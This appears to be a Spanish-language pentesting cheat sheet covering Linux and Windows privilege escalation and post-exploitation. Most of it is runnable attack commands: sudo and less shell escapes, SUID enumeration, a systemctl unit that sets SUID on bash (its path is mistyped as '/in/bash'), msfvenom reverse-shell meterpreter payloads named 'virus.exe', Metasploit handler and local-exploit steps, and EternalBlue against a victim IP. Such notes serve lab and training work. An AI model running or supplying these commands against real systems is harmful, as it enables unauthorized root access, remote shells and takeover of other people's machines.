Escalada de Privilegios + Post Explotación
Escalada de Privilegios en Linux – Sudo -l
Subimos el payload a través del protocolo FTP. Nos ponemos en escucha mientras carga la página para la Reverse Shell. Hacemos tratamiento de la TTY.
sudo -l
Con el comando proporcionado en la página debemos de poner la ruta absoluta.
Escalada de Privilegios en Linux – Sudo -l | Parte 2
sudo -l
sudo /usr/bin/less /etc/profile
!/bin/sh
Escalada de Privilegios en Linux – Binarios SUID
Otra técnica muy frecuente para escalar privilegios en Linux es la enumeración de binarios SUID, donde podremos conocer que binarios tienen setuid 0 y podemos utilizarlos para escalar privilegios en Linux.
find / -perm -4000 2>/dev/null
En el directorio /tmp
, creamos un archivo en bash con este contenido.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod u+s /in/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
Ejecutamos.
bash archivo.sh
Hemos abusado de un binario. Ya somos root.
bash -p
Escalada de Privilegios en Linux – Binarios SUID | Parte 2
find / -perm -4000 2>/dev/null
env /bin/sh -p
Escalada de Privilegios Automática con Metasploit en Linux & Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP máquina atacante> LPORT=4444 -f exe -o virus.exe
Si no es de 64 bits.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP máquina atacante> LPORT=4444 -f exe -o virus.exe
Lo compartimos en un servidor en Python.
python3 -m http.server 80
Ponemos la IP en el buscador y nos descargamos el Python. Nos ponemos en escucha mediante Metasploit.
msfconsole
use multi/handler
show options
set LHOST <IP máquina atacante>
set PAYLOAD windows/meterpreter/reverse_tcp
run
Ejecutamos nuestro payload. Somos un usuario normal por lo que hay que escalar privilegios.
background
search local_exploit_suggester
show options
sessions -l
set SESSION 1
run
Nos salen los exploits operativos pero hay que probar uno a uno.
use windows/local/tokenmagic
show options
set SESSION 1
set LHOST <IP máquina atacante>
set LPORT 5555
run
Enumeración de Usuarios en Sistemas Windows
msfconsole
search eternalblue
use 0
show options
set RHOSTS <IP máquina víctima>
run
En meterpreter.
shell
net users
El comando net users
para poder ver los usuarios existentes dentro de un sistema Windows.
Last updated
Was this helpful?